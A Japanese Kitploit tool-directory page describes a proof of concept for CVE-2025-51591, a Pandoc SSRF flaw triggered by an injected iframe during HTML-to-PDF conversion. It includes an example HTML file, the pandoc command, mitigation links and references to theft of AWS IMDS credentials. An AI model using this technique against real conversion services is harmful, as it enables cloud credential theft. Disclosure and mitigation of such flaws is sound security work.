Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-51591-Pandoc-SSRF-POC — CVE-2025-51591 Pandoc SSRF脆弱性の概念実証 | Kitploit
ツール/GitHubGitHub/malayke/cve-2025-51591-pandoc-ssrf-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubmalayke/cve-2025-51591-pandoc-ssrf-poc

CVE-2025-51591-Pandoc-SSRF-POC

CVE-2025-51591 Pandoc SSRF脆弱性の概念実証

リポジトリを見る
1110ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-51591 Pandoc SSRF POC

image

JGM Pandoc v3.6.4 におけるサーバーサイドリクエストフォージェリ (SSRF) により、攻撃者は細工されたiframeを注入することで、インフラ全体へのアクセスを取得し、侵害することが可能です。

Pandoc のインストール

  • https://pandoc.org/installing.html

ペイロード例

⚠️ iframeのURLを自身のOAST URLに置き換えてください。 ⚠️

root@kitploit:~
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CVE-2025-51591 Proof Of Concept</title>
</head>

<body>
    <h1>
        CVE-2025-51591 Proof Of Concept
    </h1>
    
</body>

</html>

Pandoc を使用してペイロードをPDFに変換

root@kitploit:~
pandoc payload.html -o output1.pdf
image

緩和策

  • https://github.com/jgm/pandoc/issues/10682#issuecomment-2718343529
  • https://pandoc.org/MANUAL.html#a-note-on-security

参考文献

  • ハッカーがPandoc CVE-2025-51591を悪用し、AWS IMDSを標的にEC2 IAM認証情報を窃取
  • IMDSの悪用:レアな動作を追跡してエクスプロイトを発見する
  • ユーザー制御のHTMLからPDFを生成する際のSSRF
ツールをダウンロード